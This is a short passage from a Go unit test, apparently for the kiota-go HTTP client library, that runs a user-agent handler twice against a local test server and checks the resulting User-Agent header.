res.WriteHeader(200) 58 | res.Write([]byte("body")) 59 | })) 60 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 61 | if err != nil { 62 | t.Error(err) 63 | } 64 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 65 | if err != nil { 66 | t.Error(err) 67 | } 68 | resp, err = handler.Intercept(newNoopPipeline(), 0, req) 69 | if err != nil { 70 | t.Error(err) 71 | } 72 | assert.NotNil(t, resp) 73 | assert.Equal(t, false, strings.Contains(req.Header.Get("User-Agent"), "kiota-go")) 74 | } 75 | --------------------------------------------------------------------------------